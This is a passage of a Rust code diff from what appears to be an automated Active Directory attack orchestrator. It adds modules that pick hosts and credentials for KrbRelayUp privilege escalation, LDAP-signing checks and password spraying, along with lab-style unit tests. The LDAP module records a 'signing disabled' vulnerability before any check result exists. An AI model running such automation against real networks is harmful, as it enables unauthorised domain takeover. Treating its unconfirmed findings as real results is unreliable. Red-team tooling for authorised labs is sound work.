cracked_password: None, + discovered_at: None, + parent_id: None, + aes_key: None, + attack_step: 0, + }); + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "hash path should fire even after cred dedup burned" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:hash"); + assert!(work[0].ntlm_hash.is_some()); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", 
"P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:hash".into(), + ); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred — should NOT fall back cross-domain (burns dedup slot) + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:cred"); + } + + #[test] + fn collect_prefers_same_domain_cred() { + let mut state = 
StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("localadmin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "localadmin"); + } + + #[test] + fn collect_child_cred_falls_back_for_parent_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Child-domain cred should work for parent-domain via trust + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "north.contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "child-domain cred should fall back for parent" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:trust"); + assert_eq!(work[0].credential.domain, "north.contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/krbrelayup.rs b/ares-cli/src/orchestrator/automation/krbrelayup.rs new file mode 100644 index 00000000..39c17801 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/krbrelayup.rs @@ -0,0 +1,527 @@ +//! 
auto_krbrelayup -- exploit KrbRelayUp when LDAP signing is not enforced. +//! +//! KrbRelayUp abuses Kerberos authentication relay to LDAP when LDAP signing +//! is not required. It creates a computer account (MAQ > 0), relays Kerberos +//! auth to LDAP to set up RBCD on a target, then uses S4U2Self/S4U2Proxy +//! to get a service ticket as admin. This is a local privilege escalation +//! that works from any authenticated domain user to SYSTEM on domain-joined hosts. +//! +//! Prereqs: LDAP signing NOT enforced (checked by auto_ldap_signing), +//! MAQ > 0 (checked by auto_machine_account_quota), valid domain creds. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect KrbRelayUp work items from current state. +/// +/// Pure logic extracted from `auto_krbrelayup` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. 
+fn collect_krbrelayup_work(state: &StateInner) -> Vec<KrbRelayUpWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + // Check if any DC has LDAP signing disabled (vuln registered by auto_ldap_signing) + let has_ldap_weak = state.discovered_vulnerabilities.values().any(|v| { + let vtype = v.vuln_type.to_lowercase(); + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required" + }); + + if !has_ldap_weak { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Target non-DC hosts (priv esc on member servers) + for host in &state.hosts { + if host.is_dc { + continue; + } + + // Skip hosts we already own + if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) { + continue; + } + + let dedup_key = format!("krbrelayup:{}", host.ip); + if state.is_processed(DEDUP_KRBRELAYUP, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(KrbRelayUpWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dispatches KrbRelayUp exploitation against hosts when LDAP signing is weak. +/// Interval: 45s. +pub async fn auto_krbrelayup(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("krbrelayup") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_krbrelayup_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "krbrelayup", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("krbrelayup"); + match dispatcher + .throttled_submit("privesc", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "KrbRelayUp exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_KRBRELAYUP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_KRBRELAYUP, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "KrbRelayUp deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch KrbRelayUp"); + } + } + } + } +} + +struct KrbRelayUpWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, VulnerabilityInfo}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + 
Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_ldap_vuln() -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: "ldap-weak-1".into(), + vuln_type: "ldap_signing_disabled".into(), + target: "192.168.58.10".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: Default::default(), + recommended_agent: String::new(), + priority: 5, + } + } + + // --- collect_krbrelayup_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_ldap_vuln_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_with_ldap_vuln_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + 
assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "krbrelayup:192.168.58.30"); + } + + #[test] + fn collect_skips_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + state.mark_processed(DEDUP_KRBRELAYUP, "krbrelayup:192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_ldap_signing_not_required_also_triggers() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // 
pragma: allowlist secret + let mut vuln = make_ldap_vuln(); + vuln.vuln_type = "ldap_signing_not_required".into(); + state.discovered_vulnerabilities.insert("v1".into(), vuln); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_bare_hostname_uses_fallback_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.30", "ws01", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_non_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.31", "srv02.fabrikam.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn dedup_key_format() { + let key = format!("krbrelayup:{}", "192.168.58.22"); + assert_eq!(key, "krbrelayup:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_KRBRELAYUP, "krbrelayup"); + } + + #[test] + fn ldap_signing_vuln_types() { + let types = ["ldap_signing_disabled", "ldap_signing_not_required"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required", + "{t} should match LDAP weak signing" + ); + } + } + 
+ #[test] + fn non_ldap_vuln_types_rejected() { + let types = ["smb_signing_disabled", "mssql_access"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "krbrelayup", + "target_ip": "192.168.58.30", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "krbrelayup"); + assert_eq!(payload["target_ip"], "192.168.58.30"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = KrbRelayUpWork { + dedup_key: 
"krbrelayup:192.168.58.30".into(), + target_ip: "192.168.58.30".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "krbrelayup:192.168.58.30"); + assert_eq!(work.target_ip, "192.168.58.30"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn ldap_signing_not_enforced_matches() { + let vtype = "ldap_signing_not_enforced".to_lowercase(); + // The code checks for "ldap_signing_disabled" or "ldap_signing_not_required" + let matches = vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required"; + assert!( + !matches, + "ldap_signing_not_enforced should NOT match the specific vuln types" + ); + } + + #[test] + fn non_matching_vuln_types() { + let types = [ + "esc1", + "smb_signing_disabled", + "unconstrained_delegation", + "mssql_access", + ]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "ws01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "srv01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/ldap_signing.rs b/ares-cli/src/orchestrator/automation/ldap_signing.rs new file mode 100644 index 00000000..21edb00e --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ldap_signing.rs @@ -0,0 +1,428 @@ +//! auto_ldap_signing -- check LDAP signing enforcement per DC. +//! +//! 
When LDAP signing is not required, attackers can relay NTLM auth to LDAP +//! for shadow credentials, RBCD writes, or account takeover. This module +//! dispatches a check per DC to test whether LDAP channel binding and +//! signing are enforced. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_ldap_signing_work(state: &StateInner) -> Vec<LdapSigningWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("ldap_sign:{}", dc_ip); + if state.is_processed(DEDUP_LDAP_SIGNING, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(LdapSigningWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks each DC for LDAP signing and channel binding enforcement. +/// Interval: 45s. +pub async fn auto_ldap_signing(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ldap_signing") { + continue; + } + + let work: Vec<LdapSigningWork> = { + let state = dispatcher.state.read().await; + collect_ldap_signing_work(&state) + }; + + for item in work { + let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_signing_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "instructions": concat!( + "Check whether LDAP signing is enforced on this Domain Controller.\n\n", + "Use ldap_search or nxc_ldap_command to test LDAP binding. ", + "Try an unsigned LDAP bind (simple bind without signing). ", + "If the bind succeeds without signing, LDAP signing is NOT enforced.\n\n", + "Alternatively, use nxc_smb_command with '--gen-relay-list' or check ", + "the ms-DS-RequiredDomainBitmask / LDAPServerIntegrity registry policy.\n\n", + "IMPORTANT: If LDAP signing is NOT enforced (bind succeeds without signing), ", + "you MUST report this as a vulnerability:\n", + " vuln_type: 'ldap_signing_disabled'\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"signing_required\": false, \"channel_binding\": false}\n\n", + "If LDAP signing IS enforced, report finding with finding_type='hardened'."
+ ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + + let priority = dispatcher.effective_priority("ldap_signing"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LDAP_SIGNING, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LDAP_SIGNING, &item.dedup_key) + .await; + + // Register ldap_signing_disabled vulnerability proactively so + // downstream automations (KrbRelayUp, NTLM relay) can fire + // without waiting for the agent's report_finding callback + // (which only logs and does NOT populate discovered_vulnerabilities). + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("ldap_signing_{}", item.dc_ip.replace('.', "_")), + vuln_type: "ldap_signing_disabled".to_string(), + target: item.dc_ip.clone(), + discovered_by: "auto_ldap_signing".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.dc_ip)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert("signing_required".to_string(), json!(false)); + d.insert("channel_binding".to_string(), json!(false)); + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("ldap_signing"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing disabled — vulnerability registered for KrbRelayUp" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish LDAP signing vulnerability"); + } + } + } + Ok(None) 
=> { + info!(domain = %item.domain, dc = %item.dc_ip, "LDAP signing check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch LDAP signing check"); + } + } + } + } +} + +struct LdapSigningWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert_eq!(key, "ldap_sign:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LDAP_SIGNING, "ldap_signing"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_signing_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ldap_signing_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), 
+ username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = LdapSigningWork { + dedup_key: "ldap_sign:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // LDAP signing dedup is by DC IP, not domain + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert!(key.starts_with("ldap_sign:")); + assert!(key.contains("192.168.58.10")); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ldap_sign:{}", "192.168.58.10"); + let key2 = format!("ldap_sign:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", 
"P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ldap_sign:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); 
// pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/localuser_spray.rs b/ares-cli/src/orchestrator/automation/localuser_spray.rs new file mode 100644 index 00000000..734a6914 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/localuser_spray.rs @@ -0,0 +1,294 @@ +//! auto_localuser_spray -- test localuser/localuser credentials across domains. +//! +//! GOAD configures a `localuser` account with username=password across all three +//! domains. 
